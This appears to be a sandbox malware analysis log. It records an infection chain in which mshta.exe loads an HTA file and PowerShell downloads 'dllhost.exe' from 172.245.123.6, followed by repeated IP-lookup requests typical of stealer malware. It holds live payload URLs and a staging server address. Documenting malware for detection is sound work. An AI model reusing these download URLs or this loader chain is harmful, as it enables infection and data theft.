            Source: global trafficHTTP traffic detected: GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 172.245.123.6If-Range: "1ceb0-6234c398c9718"
            Source: global trafficHTTP traffic detected: GET /770/dllhost.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.6Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 30 Sep 2024 01:35:50 GMTConnection: Keep-AliveHost: 172.245.123.6If-None-Match: "1ceb0-6234c398c9718"
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: og1.in
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: mshta.exe, 0000000C.00000003.470945172.0000000003804000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.0000000003804000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.0000000003804000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.0000000003804000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/
            Source: powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/770/dllhost
            Source: powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/770/dllhost.exe
            Source: powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/770/dllhost.exep
            Source: powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.482999826.000000001C264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/770/dllhost.exes
            Source: powershell.exe, 00000011.00000002.482999826.000000001C264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/770/dllhost.exes?e
            Source: mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/C
            Source: mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/O
            Source: mshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472468543.000000000374A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471050000.000000000374A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta
            Source: mshta.exe, 0000000C.00000003.467118716.0000000000142000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472118068.0000000000131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta...
            Source: mshta.exe, 00000004.00000003.420063943.000000000305C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420394140.000000000305C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta...EEBDD-A8
            Source: mshta.exe, 0000000C.00000003.468426129.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.000000000375C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta0
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta4
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta7
            Source: mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta8A
            Source: mshta.exe, 00000004.00000002.420227515.000000000022A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaA
            Source: mshta.exe, 00000004.00000002.420227515.000000000022A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaC:
            Source: mshta.exe, 00000004.00000002.420227515.000000000022A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaW
            Source: mshta.exe, 0000000C.00000003.468426129.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.000000000375C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaet
            Source: mshta.exe, 00000004.00000003.417386530.00000000027A5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.467894962.0000000002B45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470616202.0000000002B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htahttp://172.245.123.6/xampp/crio/IEnetbo
            Source: mshta.exe, 00000004.00000002.420227515.000000000022A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htas
            Source: RegSvcs.exe, 0000000E.00000002.630259466.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002606000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002696000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002499000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002405000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: RegSvcs.exe, 0000000E.00000002.630259466.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002606000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026D2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002649000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000025FA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002696000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002499000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000023F9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002448000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002405000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: RegSvcs.exe, 0000000E.00000002.630259466.0000000002561000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.632431722.00000000053CF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.000000000071B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.632454765.00000000056F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002361000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: RegSvcs.exe, 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000787000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.632454765.00000000056F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C1B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449516187.000000001A62F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000787000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.632454765.00000000056F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 00000007.00000002.450490527.000000001C26D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: powershell.exe, 00000007.00000002.441192247.000000000386C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
            Source: powershell.exe, 00000007.00000002.448635325.0000000012391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
